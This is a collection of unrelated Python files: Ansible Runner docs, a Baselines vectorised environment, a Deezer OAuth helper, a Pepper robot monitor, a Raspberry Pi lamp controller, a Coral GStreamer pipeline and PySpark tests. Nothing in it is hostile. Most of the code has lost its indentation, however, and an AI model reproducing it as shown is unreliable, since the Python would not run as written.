:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param process_isolation: Enable limiting what directories on the filesystem the playbook run has access to.
:param process_isolation_executable: Path to the executable that will be used to provide filesystem isolation (default: bwrap)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type quiet: bool
:type verbosity: int
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:returns: A :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
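# Example usage (a sketch; the private data dir and playbook name are placeholders):
#
#   thread, runner = run_async(private_data_dir='/tmp/demo', playbook='site.yml')
#   thread.join()                  # wait for the background run to finish
#   print(runner.status, runner.rc)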
|
multiprocessing_env.py
|
#This code is from openai baseline
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import numpy as np
from multiprocessing import Process, Pipe
import gym
import gym_sokoban
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
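# Example usage (a sketch; the environment id is a placeholder):
#
#   def make_env():
#       return gym.make('Sokoban-v0')
#   envs = SubprocVecEnv([make_env for _ in range(4)])
#   obs = envs.reset()                                   # stacked: shape (4, ...)
#   obs, rews, dones, infos = envs.step([envs.action_space.sample()] * 4)
#   envs.close()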
|
auth.py
|
import time
import uuid
import webbrowser
from threading import Thread
from flask import Flask, redirect, request, render_template
from urllib import parse
HOST = "localhost"
PORT = "8080"
HOME_URI = f"http://{HOST}:{PORT}/"
REDIRECT_URI = f"{HOME_URI}token"
AUTH_ENDPOINT = "https://connect.deezer.com/oauth/auth.php"
CLIENT_ID = 461222
app = Flask(__name__)
def auth_uri(scope="manage_library", response_type="token", **kwargs):
kwargs.update(
{
"client_id": CLIENT_ID,
"scope": scope,
"response_type": response_type,
"redirect_uri": REDIRECT_URI,
}
)
return f"{AUTH_ENDPOINT}?{parse.urlencode(kwargs)}"
@app.route("/", methods=["GET"])
def forward_to_deezer():
uri = auth_uri()
return redirect(uri)
@app.route("/token", methods=["GET"])
def auth_success():
if request.args.get("error_reason") == "user_denied":
return "Error: user declined auth"
return render_template("token.html")
@app.route("/submit", methods=["GET"])
def receive_token():
global TOKEN
TOKEN = request.args.get("access_token")
shutdown_func = request.environ.get("werkzeug.server.shutdown")
if shutdown_func is None:
raise RuntimeError("Not running with the Werkzeug Server")
# Surprisingly this works, I guess werkzeug attempts a graceful shutdown.
shutdown_func()
return "Autentication complete, you may now close this tab."
def get_token():
    # Authentication token. The flask server is only spun up transiently to
    # obtain a token. TOKEN has to be the module-level global here, not a
    # local: receive_token() runs in the server thread and assigns the global,
    # and this polling loop must observe that assignment.
    global TOKEN
    TOKEN = None
server_process = Thread(target=app.run, kwargs={"host": HOST, "port": PORT})
server_process.start()
webbrowser.open_new_tab(HOME_URI)
while TOKEN is None:
time.sleep(0.1)
return TOKEN
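# Example usage (a sketch; the requests call is illustrative only):
#
#   token = get_token()
#   # requests.get("https://api.deezer.com/user/me", params={"access_token": token})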
|
alltasksconfirmed.py
|
import qi
import argparse
import sys
import time
import threading
import os
import conditions
from conditions import set_condition
monitorThread = None
def rhMonitorThread (memory_service):
t = threading.currentThread()
while getattr(t, "do_run", True):
try:
value = memory_service.getData("tasks_to_confirm")
except RuntimeError:
# the variable is not declared yet, so it is false
#print "ERROR retrieving value"
            value = 0
if (value):
v = 'false'
else:
v = 'true'
        set_condition(memory_service,'alltasksconfirmed',v)
        time.sleep(0.25)  # poll a few times per second instead of busy-looping
print "alltasksconfirmed thread quit"
def init(session):
global monitorThread
print "alltasksconfirmed init"
#Starting services
memory_service = session.service("ALMemory")
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
def quit():
global monitorThread
print "alltasksconfirmed quit"
monitorThread.do_run = False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
app = qi.Application(["alltasksconfirmed", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
init(session)
#Program stays at this point until we stop it
app.run()
quit()
if __name__ == "__main__":
main()
|
main.py
|
import RPi.GPIO as GPIO
import pygame
from threading import Thread
import time
import smbus
import csv
pin_count = 12
pins = [
5, 6, 12, 16,
17, 18, 22, 23,
24, 25, 26, 27
]
is_playing = [False for i in range(0, pin_count)]
keys_pressed = 0
cur_ptrn_id = 0
addr_1 = 0x38
addr_2 = 0x39
patterns = []
def bytes_from_file(filename, chunksize=8192):
with open(filename, "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def i2c_thread():
global keys_pressed
global cur_ptrn_id
global patterns
cleared = False
try:
bus = smbus.SMBus(1)
while(True):
if (keys_pressed > 0):
bus.write_i2c_block_data(addr_1, 0, [patterns[cur_ptrn_id][0]])
bus.write_i2c_block_data(addr_2, 0, [patterns[cur_ptrn_id][1]])
cur_ptrn_id += 1
if cur_ptrn_id == len(patterns):
cur_ptrn_id = 0
time.sleep(patterns[cur_ptrn_id][2])
cleared = False
if (keys_pressed == 0 and not cleared):
cleared = True
bus.write_i2c_block_data(addr_1, 0, [0x00])
bus.write_i2c_block_data(addr_2, 0, [0x00])
    except Exception as e:
        print("I2C Error:", e)
if __name__ == "__main__":
GPIO.setmode(GPIO.BCM)
FILENAME = "lamps.csv"
with open(FILENAME, "r", newline="") as file:
reader = csv.reader(file)
for row in reader:
x = 0
y = 0
for c in row[0].split():
if int(c) <= 6:
x |= 1 << (int(c) - 1)
else:
y |= 1 << (int(c) - 7)
patterns.append([x, y, float(row[1])])
pygame.init()
launch_sound = pygame.mixer.Sound("/home/pi/audio/start.ogg")
launch_sound.play()
print(len(patterns))
print(patterns)
for pin in pins:
GPIO.setup(pin, GPIO.IN)
thread = Thread(target = i2c_thread)
thread.start()
sounds = [pygame.mixer.Sound("/home/pi/audio/audio_" + str(i) + ".ogg") for i in range(1, pin_count+1)]
try:
while(True):
for i in range(0, pin_count):
if GPIO.input(pins[i]) == 1:
if not is_playing[i]:
is_playing[i] = True
sounds[i].play(-1)
keys_pressed += 1
else:
if is_playing[i]:
is_playing[i] = False
sounds[i].fadeout(700)
keys_pressed -= 1
except:
print("Bye")
GPIO.cleanup()
|
gstreamer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
import time
import numpy as np
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
# require_version() must be called before importing from gi.repository,
# otherwise the bindings may load the wrong (default) typelib versions.
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback, render_callback, src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}' % videosrc
scale = min(inference_size[0] / src_size[0],
inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(
width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
#TODO: Fix pipeline for the dev board.
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
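# Example usage (a sketch; callbacks, sizes and the video device are placeholders):
#
#   def inf_callback(input_tensor):
#       return 'result'      # run the model on the raw RGB tensor here
#
#   def render_callback(output, src_size, box):
#       svg = '<svg></svg>'  # overlay to draw on top of the video
#       return svg, False    # (svg string, freeze-frame flag)
#
#   run_pipeline(inf_callback, render_callback,
#                src_size=(640, 480), inference_size=(481, 353),
#                videosrc='/dev/video0')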
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark import keyword_only
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
from pyspark.taskcontext import TaskContext
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
